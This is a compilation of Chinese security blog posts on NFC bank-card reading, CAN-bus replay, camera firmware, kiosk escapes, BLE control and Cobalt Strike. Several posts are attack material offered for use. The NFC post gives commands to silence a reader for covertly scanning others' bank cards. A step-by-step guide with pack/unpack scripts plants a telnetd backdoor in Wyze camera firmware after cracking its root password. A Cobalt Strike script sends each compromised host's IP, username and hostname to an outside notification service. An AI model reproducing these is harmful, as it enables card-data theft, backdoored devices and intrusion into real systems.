后记：其实上面的演示，你只要有个NFC读卡器就行，这个是最重要的，然后我的python程序是在window10上写的，之后放到了树莓派中。所以上面提到的exe文件工具，如果你是苹果电脑打不开，可能得另想办法。然后我最后面写的参考文章你也可以看看，里面有很多东西也是很重要的，不然你可能会看不懂我在说什么。这个NFC读卡器只针对带有芯片的银行卡，纯磁条卡不行。你使用这个信息读取器读取银行卡时，有时候会碰到持卡人姓名，证件号没有的情况，而且其实这种是大多数的情况，这因为银行在建卡时没有把这些数据写入。PBOC3.0目前的规范是不强制录入持卡人信息，据说PBOC4.0就是建议不要录入持卡人信息，而我们现在正处于PBOC3.0到PBOC4.0之间的阶段。

声明：本软件不得用于商业及非法用途，仅做学习交流使用。

参考文章:

使用Python读取银行卡信息Debian系统pyscard安装根据银行卡号码获取银行卡归属行以及logo图标金融tag对应表[转]android点滴之NFC手机如何轻松读取银行卡信息？PBOC APUD指令学习--SELECT命令APDU常用指令GSM和USIM常用APDU指令错误码JRT0025.5-2018 中国金融集成电路（IC）卡规范 第5部分：借记贷记应用卡片规范使用NFC读卡器ACR122u读取银行卡信息pyscard库官方文档TLV 格式及编解码

附A：如何关闭ACR122U读卡器刷卡蜂鸣声。有时候我们想神不知鬼不觉的扫一下银行卡，所以我们得把这个声音关掉。

打开ACR122UTool.exe
点击Reader Commands -> New Connection
点击Send Commands -> Direct Command
在Data in的命令框中输入：FF00520000
点击Send Direct，即操作完成，此时再放上银行卡声音已经没了。

（另：如需恢复声音，执行FF0052FF00即可。）

（注：以上内容可参考文档API-ACR122U-CN-2.04.pdf，上文资料里已包含。）

Siri终于可以帮我浇花了

Fri, 26 Jun 2020 18:12:00 +0800

原创年华不散场 2020-06-26 18:12

之前公众号刚申请的时候就写了一篇文章，是一个关于远程浇花的想法，想了很久都没去实现，最近端午放假就做了一下，程序可能有很多漏洞😄大佬们手下留情。先上视频：

来看一下整个系统的接线图，主要就是ESP8266和继电器的连接。

接下来看看原理图，本来想使用MQTT协议，无奈太菜只好用python起个flask，然后使用ESP的HTTP模块请求云服务监测是否有任务需要执行。

具体的代码如下：

ESP8266芯片文件代码：

light = 4flowerControlPin = 1gpio.mode(light,gpio.OUTPUT)gpio.mode(flowerControlPin,gpio.OUTPUT)
--Flower Timer (close Flower control Pin)FlowerTimer = tmr.create()FlowerTimer:alarm(5000,tmr.ALARM_SEMI,function()     gpio.write(light,gpio.HIGH)     gpio.write(flowerControlPin,gpio.LOW)     print("stop.....") end)FlowerTimer:stop()
-- mainfunction main()    dofile("server.lua")end
wifi.eventmon.register(wifi.eventmon.STA_GOT_IP, function(AcquiredInfo)------------------------------------------------------------    print("\nSTA - GOT IP".."\nStation IP: "..AcquiredInfo.IP..    "\nSubnet mask: "..AcquiredInfo.netmask..    "\nGateway IP: "..AcquiredInfo.gateway)    main()------------------------------------------------------------end)
dofile("wificfg.lua") -- waiting WiFi connect

ESP8266芯片文件代码：

------------------------------------[[WIFI config SSID PASSWORD]]--
wifi.setmode(wifi.STATION)wifi.sta.config({ssid="ssid",pwd="mimamima"})wifi.sta.connect()

ESP8266芯片文件代码：

------------------------------------[[ HTTP server config page  ]]--
joburl = "http://1.1.1.1:8000/getjob"
function getjob(code,data)    if (code < 0) then      print("HTTP request failed")    else        if (data=="watertheflower") then            gpio.write(light,gpio.LOW)            gpio.write(flowerControlPin,gpio.HIGH)            FlowerTimer:start()            print("start.....")        else            print(data)        end    endend
function doJob()    print("Hi I am runing")    http.get(joburl, nil, getjob)end
JobTimer = tmr.create()JobTimer:alarm(2000,tmr.ALARM_AUTO,doJob)JobTimer:stop()JobTimer:start()

服务器端python代码：

from flask import Flaskimport time
app = Flask(__name__)
task = Falselastwatertheflower = 0authentication = "asdf1234"

def setTask():    global task    global lastwatertheflower    lastwatertheflower = int(time.time())    if task == False:        task = True
def undoTask():    global task    if task == True:        task = False
@app.route('/assigntask/')def assigntask(password):    if password != authentication:        return "faild"    now = int(time.time())    if now-lastwatertheflower > 3600:        setTask()        data = 'success'    else:        data = "faild"    return data

@app.route('/getjob')def getjob():    if task:        undoTask()        return 'watertheflower'    else:        return 'nothing'
if __name__ == '__main__':    app.run(host='0.0.0.0', port=8000, debug=True)

iPhone快捷指令：

代码总共加起来都没到200行，本来想使用AES加密一下时间戳和指令，但是无奈找不到iPhone快捷执行的JSBox怎么用😂。

当然也可以使用server酱的TalkAdmin来控制，直接将web地址填入WebHook即可

仅供给大家提供一个好玩的思路，在这个远程浇花的系统中可能存在漏洞点如下：

1.客户端-服务器明文传输，可能导致重放攻击、密钥泄漏

2.服务器-终端设备明文传输，可能导致重放攻击、任意用户控制终端设备（是说其他人可以随便给我浇花么😭）

欢迎找到其他漏洞的小伙伴在下方留言哇！

智能汽车安全入门｜世界智能驾驶挑战赛总结

Thu, 18 Jun 2020 23:49:00 +0800

原创年华不散场 2020-06-18 23:49

车联网学习入门～CAN总线安全学习入门～

0x00 基本介绍

这两天参加了世界智能汽车挑战赛，比赛使用了visual threat的汽车仿真设备。不过这个文章题目起的有些夸张，准确的说应该是CAN总线安全学习入门

本想复盘一下比赛，但因为我们无法使用visual threat模拟器，遂从网上找到一个名为ICSim的模拟器来模拟CAN总线，安装起来极为友好

安装方法：

sudo apt-get install libsdl2-dev libsdl2-image-dev can-utilsgit clone https://github.com/zombieCraig/ICSim.git

启动方法：

./icsim vcan0./controls vcan0

0x01 思路

比赛中的第一个题目要求对汽车协议(如车灯、门锁、后备箱锁、仪表等)完成有效数据提取并实现协议破解。此处我们使用ISCim生成流量模拟比赛过程

经过比赛之前的分析，我们猜测开门的报文可能分为以下3种情况：

1. 只有一条报文控制开门，按下开门按钮后，CAN总线上产生一条开门的报文。

2. 车门状态报文一直在定时发送，但每当按下一次开门按钮，报文中的数据(DATA)会发生一次变化。

3. 有多条时序报文控制车门开启（报文存在序列号检测或加密校验）

针对以上情况，我们提出了两种解决方案：

1. 对所有的CAN数据进行统计，检索出与开门次数相同次数的ID报文

2. 对所有的CAN数据进行统计，检索出仅数据(DATA)发生变化次数为开门次数的ID报文

（可能有点绕，但是还是比较靠谱的）

0x02 实践

依旧使用ICSim模拟，使用candump抓包CAN总线数据包

按下开门五次，接下来对该数据包进行分析，查找出ID出现五次的报文：

提取出该数据包后，对其进行重放测试是否有效:

完美，接下来我们尝试提取转向灯的数据，却发现无法检索到仅出现打转向灯次数的ID报文。

因此我们怀疑有可能是第二种情况，我们将使用脚本进一步分析数据(DATA)发生变化次数为打转向灯次数的报文。

我们打转向灯三次并抓包，使用脚本分析：

查看抓包中的0x188报文，可以发现在我们没有按下转向灯时，也是有报文在发送只是DATA段为0，在我们按下转向灯时，DATA段发生了变化如下所示。

对转向灯数据包重放：

第一次接触CAN总线还是缺乏相关的准备，比赛后面的题目还是很有意思的，例如远程篡改汽车车辆识别号码等等。比赛之前也搜集很多关于车联网的资料，如果有需要的小伙伴请在公众号后台回复<车联网>获取车联网资料。

最后，618我们也搞个小活动呀，师傅可以分享本文到朋友圈，然后扫描下方小程序码参与抽奖～

物联网安全｜手把手带你制作恶意固件

Wed, 17 Jun 2020 09:00:00 +0800

原创年华不散场 2020-06-17 09:00

今天我们来分享一篇在摄像头固件中加入后门并重新打包的文章！！

今天我们来分享一篇在摄像头固件中加入后门并重新打包的文章

今天我们选择的是一款Wyze摄像头，固件版本（demo_v2_4.9.5.36），后台回复<摄像头>获得下载地址

首先使用binwalk分析一下固件：

binwalk -t demo_v2_4.9.5.36.bin

分析1中的uImage信息，该引导程序告诉了我们很多关于固件的信息，例如架构MIPS、创建时间、系统类型还包括了CRC校验等等

根据第二部分中的uImage头信息，可以发现内核为Linux-3.10.14

第三部分为两个SquashFS文件系统，SquashFS是一种只读文件系统

第四部分是一个JFFS2文件系统。

现在我们可以使用binwalk -e提取所有的文件，但是我们为了一会儿方便的打包，我们自己写个程序提取文件。

#!/usr/bin/env python3
import sys
class Firmwarepart:    def __init__(self,name,offset,size):        self.name = name        self.offset = offset        self.size = size
firmware_parts = [    Firmwarepart("uimage_header",0x0,0x40),    Firmwarepart("uimage_kernel",0x40,0x200000),    Firmwarepart("squashfs_1",0x200040,0x350000),    Firmwarepart("squashfs_2",0x550040,0xa0000),    Firmwarepart("jffs2",0x5F0040,11075648-0x5F0040)]
if sys.argv[1] == 'unpack':    f = open(sys.argv[2],"rb")    for part in firmware_parts:        outfile = open(part.name,"wb")        f.seek(part.offset,0)        data = f.read(part.size)        outfile.write(data)        outfile.close()        print(f"Wrote {part.name} - {hex(len(data))} bytes.")

运行

wyze_extractor.py unpack demo_v2_4.9.5.36.bin

提取后的文件如下图所示：

对于squashFS文件系统的提取，我们使用unsquashfs来实现：

unsquashfs -d squashfs_2_out squashfs_2

对于jffs2文件系统的提取，我们使用jefferson来实现：

jefferson -d jffs2_out jffs2

提取之后检查一下敏感信息，shadow文件如下：

使用john破解一下

现在我们知道了root的账号密码，如果开启了ssh服务，那我们就可以通过ssh登陆到主机。找一下系统启动项：

vi /etc/init.d/rcs

我们可以看到系统在启动时的确是启动了telnet服务，但是实际上telnet服务并未启动（通过扫描端口发现）。

我们在解包后的固件里直接搜索

grep -r telnet .

可以看到在iCamera文件里，telnet服务被禁用掉了。

事实上，该摄像头使用的telnet服务实际上为busybox中的telnet，所以我们可以将启动脚本中的telnet修改为：

busybox telnetd &

现在这个服务就不会被kill掉了，接下来我们要将这几个文件系统重新打包并生成固件。

我们使用unsquashfs查看一下原来的文件系统信息：

unsquashfs -s squashfs_1

接下来使用mksquashfs命令将更改后的新文件系统打包

mksquashfs squashfs_1_out/ squashfs_1_new -comp xz -b 131072

我们再将之前的程序加上一个打包功能，这样我们就可以把这两个squashfs文件系统和jffs2文件系统打包起来。

#!/usr/bin/env python3
import sys
class Firmwarepart:    def __init__(self,name,offset,size):        self.name = name        self.offset = offset        self.size = size
firmware_parts = [    Firmwarepart("uimage_header",0x0,0x40),    Firmwarepart("uimage_kernel",0x40,0x200000),    Firmwarepart("squashfs_1",0x200040,0x350000),    Firmwarepart("squashfs_2",0x550040,0xa0000),    Firmwarepart("jffs2",0x5F0040,11075648-0x5F0040)]
if sys.argv[1] == 'unpack':    f = open(sys.argv[2],"rb")    for part in firmware_parts:        outfile = open(part.name,"wb")        f.seek(part.offset,0)        data = f.read(part.size)        outfile.write(data)        outfile.close()        print(f"Wrote {part.name} - {hex(len(data))} bytes.")elif sys.argv[1] == 'pack':    f = open(sys.argv[2],"wb")    for part in firmware_parts[1:]:        i = open(part.name,"rb")        data = i.read()        f.write(data)        padding = (part.size - len(data))        print(f"Wrote {part.name} - {hex(len(data))} bytes.")        print(f"Padding {hex(padding)}")        f.write(b'\x00' * padding)

这样我们仅仅将文件系统打包，至于生成镜像的uImage header部分我们使用其他工具。先使用binwalk查看一下uImage_header:

着重关注以上几个部分，接下来使用mkimage来生成镜像：

mkimage -A MIPS -O linux -T firmware -C none -a 0 -e 0 -n jz_fw -d demo_backdoored.bin demo_images.bin

可以看到我们生成的镜像和之前几乎相同，因为没有实际的摄像头，此处就不对结果进行验证了。最终效果是摄像头启动后可开启telnetd服务，我们可以通过root账号密码管理摄像头。

参考链接：

https://www.youtube.com/watch?v=hV8W4o-Mu2o

你点的每个赞，我都认真当成了喜欢

自助终端设备安全剖析

Thu, 04 Jun 2020 21:13:00 +0800

原创 Radon 2020-06-04 21:13

Radon师傅：自助终端设备安全剖析

随着经济的发展，自动售货机已经出现在大街小巷；在机场、车站等交通系统自助购票、取票也已普及；医院、银行、政务大厅等机构也都遍布着不同的自助终端设备，大大方便了人们的生活水平，提高了办事效率。对于自助终端设备的安全问题，人们的关注点却比较少，受年华表哥邀请，特写此文对自助终端设备安全做简单的分析与大家交流。

0x00 基本介绍

自助终端设备是将触控屏和相关系统软件进行结合，再配以相关功能与服务的一种电子终端设备。一般由人机界面组成，由用户根据设备提示进行操作，辅以网络，结合手机终端或设备传感器组件完成整个功能服务流程。

自助终端设备目前已广泛应用于通讯、金融、政府、交通、医疗、工商、税务等行业。若是按照功能分类基本可以分为：

自助充值终端
自助缴费终端
自助售货终端
自助发卡终端
自助售取票终端
自助打印终端
自助查询终端

0x01 操作系统

目前，自助终端设备常用的操作系统为Windows和Android这两种，也有少数的Linux系统。

根据提供的功能服务采用不同的操作系统，比如常见的一些自动售货机、贩卖机大都使用Android系统，系统之上安装服务应用APK。然后通过禁用和隐藏Android导航栏和通知菜单的手段防止用户跳出应用。

对于一些售取票终端、政务系统等大多数使用的是Windows系统，服务应用通常采用将程序窗口最大化并且始终置顶的方式进行运行，同时隐藏系统桌面和状态栏，使用户只能在当前应用下操作。

0x02 网络通信

对于自助终端设备来说，网络通信的实现有三种方式：

3G/4G移动网络
WiFi无线网络
有线以太网

对于一些特定场所、具体实施、具有布线规划要求的自助终端设备，比如机场车站的售取票机、政府医院银行的自助设备，一般都是使用网线进行连接，也不排除会有无线网络接入的情况。其网络连接情况一般为内网地址。

绝大多数的自助售卖机由于场所的限制，使用的是4G移动网络，这样也就局限了所使用的操作系统即为Android。有的自助终端会使用4G移动网络生成热点，然后再进行连接热点的方式进行通信。对于这种服务终端而言，它们都会与互联网进行通信，直接与外网进行数据传输。

这里对自助终端设备的消费模式稍微展开讲一下：

我们常见的水卡、电卡、饭卡等充值消费终端为IC卡感应，使用时不需要接入互联网，但是终端设备在进行结算时还是需要互联网的，所以有些终端短暂断网是可以工作的。

有些自助终端设备是通过授权码进行消费或服务的，用户通过APP或者小程序进行支付，然后获取终端设备的授权码进行输入，获取相关服务，比如快递柜取件码。

目前自助售卖机最常见的为支付宝/微信扫码支付，有的会支持人脸识别。

目前的自助售货终端在后台都会有一套自动售货管理系统，一般具有远程管理、查看机器状态、报警故障、实时监控信息、获取到详细的销售数据、更新屏幕广告内容、制定各种促销活动等功能。通过云平台管理服务还可实现多种收款方案、进行提现等。

0x03 传感设备组件

之所以称它们为自助终端设备，当然是少不了传感设备组件。

首先是实现交互功能的红外线技术触控屏，有的支持单点触控，有的支持多点触控，很容易判断。另外有些自助终端设备还带有物理键盘或者小型的定制键盘，比如常见的ATM机。比较先进的自助终端设备还配有语音识别进行交流等。

另外自助终端设备组件还有摄像头、麦克风、扬声器、红外传感器、温度/湿度传感器这些比较常规的组件。

对于特定的设备，比如机场车站的取售票机器会有身份证读取器、学生证IC读卡器，超市自助收银终端会有条码扫描器，高校水卡饭卡电卡等系统会有IC卡读卡器等。具有打印单据、票据、车船票等的终端还会配有专门的打印机封装在整个终端设备中。

0x04 逃逸方法

通过总结遇到过的自助终端逃逸案例和方法，现不完全总结为以下脑图，仅供参考，欢迎补充。

非预期操作

通过对自助终端设备进行一些非预期操作，最常见的就是断电重启，当应用程序在启动过程中时，可快速切换系统桌面，打开应用管理器对应用程序强制退出，若有守护进程，一起kill掉即可。另外还可通过频繁点击导致应用崩溃闪退的方法使应用重启。

设备编号/序列号

有的自助终端设备在屏幕上会显示设备编号或者序列号等信息，可以尝试多次点击或者长按的方法，有的会有预留管理页面或者显示更过的版本信息或者厂家信息。

触控手势

有的设备会使用Windows的平板模式或者Android系统的横屏模式，可以使用一些常见的手势操作，如果没有屏蔽的话，会有意想不到的惊喜。

屏幕键盘

在自助终端设备抛弃实体键盘之后，屏幕键盘却成为了逃逸的一个缺口。Windows系统如果没有关闭屏幕键盘的话会侧边停靠在屏幕边缘，仔细观察就能发现，尝试打开后可以使用各种快捷键进行操作。

跳转

当屏幕闪烁或者加载时，一般情况下是发生了当前主应用去调用子应用的情况，比如某饮料贩卖机使用人脸支付时，会后台拉起一个独立安装的人脸识别APP，如此可能会显示菜单栏等，抓住机会可跳出应用。
在应用内的“查看帮助”、“关于”、“更多”等需要我们格外注意，这种一般为URL链接，点击后可能会调起浏览器，从而跳出应用。

双击/长按调出右键菜单

在有些Windows系统的自助终端设备，没有屏蔽掉右键菜单的情况下，可以通过全选等操作，唤起右键菜单，从而能获取更多的操作选项，比如打印、属性、设置等。

0x05 总结

自助终端设备越来越多的进入到我们的视野当中，机场、火车站、汽车站、医院、高校、银行、政务服务大厅、超市、商场等许多地方都会有这些设备的身影。其产生的安全危害小到售卖机失窃，大到进入各种系统进行内网渗透。以上仅为技术交流，请勿用于非法用途。

参考链接：

https://mp.weixin.qq.com/s/hKuhz6SZ7tXEHUqla1PsIQ

摄像头SPI固件提取

Sat, 23 May 2020 18:00:00 +0800

原创 2020-05-23 18:00

黑客李泉倾情打造

https://github.com/nian-hua/Litchi

litchi-低功耗蓝牙测试小工具

Fri, 01 May 2020 20:00:00 +0800

原创年华不散场 2020-05-01 20:00

低功耗蓝牙小工具

Hello，师傅们晚上好。今天我们来介绍个低功耗蓝牙小工具，在这之前我们先简单介绍一下低功耗蓝牙(BLE)

先附上地址｜欢迎师傅们star
https://github.com/nian-hua/Litchi

蓝牙自4.0版本以后开始支持低功耗，在与BLE交互的过程中，最重要的是Characteristic、Desciptor、Service这三个概念：

Characteristic：可以理解为一个数据类型，它包括一个value和0至多个对此characteristic的描述(Descriptor)

Descriptor：对Characterisctic的描述，如范围、单位等

Service：是Characteristic的集合，它可以包含多个Characteristic

重点：一个BLE终端可以包含多个Service，一个Service可以包含多个Characteristic，一个Characteristic包含一个value和多个Descriptor，一个Descriptor包含一个value（其中Characteristic比较重要，用的比较多）

我们再来看一下图片介绍

上图中，右侧图片为一个BLE设备的实例，可以看到在图片中有4个service，前两个为Unknown service，后两个分别是Battery Service(电池服务)和Current Time Service(当前时间服务)。而在第二个Unknown service中，有一个Unknown Characteristic。值得一提的是，Service和Characteristic各自拥有一个UUID用于标识，在BluetoothGatt类的相关函数中，就是用这些UUID找到所需的service和characteristic，这就相当于TCP通信中的端口（port）
胖猴实验室

根据胖猴实验室之前发布的文章，我们找到了同款存在未授权控制漏洞的灯泡，该灯泡可在未经绑定的情况下直接对其发送蓝牙数据进行控制，如下图所示：

这里我们使用litchi扫描附近的BLE设备连接，选择service、Characteristic并发送数据

当然也可以在启动的时候指定Device、Service、Characteristic，并直接发送数据

大家可以使用-h命令查看帮助

我们来看看效果

欢迎师傅们star

Cobalt Strike 上线微信提醒

Tue, 21 Apr 2020 20:57:00 +0800

算命瞎子 2020-04-21 20:57

Cobalt Strike 上线微信提醒

Server酱是什么「Server酱」，英文名「ServerChan」，是一款「程序员」和「服务器」之间的通信软件。说人话？就是从服务器推报警和日志到手机的工具。开通并使用上它，只需要一分钟：登入：用GitHub账号登入网站，就能获得一个SCKEY（在「发送消息」页面）绑定：点击「微信推送」，扫码关注同时即可完成绑定发消息：往 http://sc.ftqq.com/SCKEY.send 发GET请求，就可以在微信里收到消息啦

先看看效果

复制下面代码保存为 http_ftqq.cna 文件。

或者百度云下载：https://pan.baidu.com/s/15LPGaTLkdWWgVZW8A1E82g 提取码：nm1y

注意：需要修改代码25行链接内容为你Server酱的SCKEY码

# 循环获取所有beaconon beacon_initial {
    sub http_get {        local('$output');        $url = [new java.net.URL: $1];        $stream = [$url openStream];        $handle = [SleepUtils getIOHandle: $stream, $null];
        @content = readAll($handle);
        foreach $line (@content) {            $output .= $line . "\r\n";        }
        println($output);    }    #获取ip、计算机名、登录账号    $internalIP = replace(beacon_info($1, "internal"), " ", "_");    $userName = replace(beacon_info($1, "user"), " ", "_");    $computerName = replace(beacon_info($1, "computer"), " ", "_");
    #get一下Server酱的链接    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
    http_get($url);
}

把cna脚本添加到本地客户端后，如果beacon上线了，这个提醒的请求是从客户端发出的。

那么问题来了，如果我要接收通知，是不是就得一直开着客户端连着teamserver？

这样就非常不方便了，而且如果网络有波动，断开了到teamserver的连接，就收不到通知了。

其实在服务器端有个 agscript 文件，他就是用来在服务器端运行cna文件的，这样就不用一直连着服务器端。

./agscript [host] [port] [user] [pass]

[host] #服务器的ip地址。
[port] #cs的端口号，启动cs时有显示。
[user] #用户名，用来运行这个脚本的用户名，随便即可。
[pass] #cs的密码，就是启动cs时你设置的密码。
[path] #cna文件的路径。

注：Server酱同样内容的消息一分钟只能发送一次。

过程中遇到Server酱微信推送中的问题
输出到微信端的文字不换行。
最后查百度找到的内容是写在URL里则应该是%0D%0A%0D%0A

参考资料：

CobaltStrike插件开发官方指南 Part3
https://xz.aliyun.com/t/6188

Aggressor Script http dome
https://github.com/001SPARTaN/aggressor_scripts/blob/master/http.cna

广告时间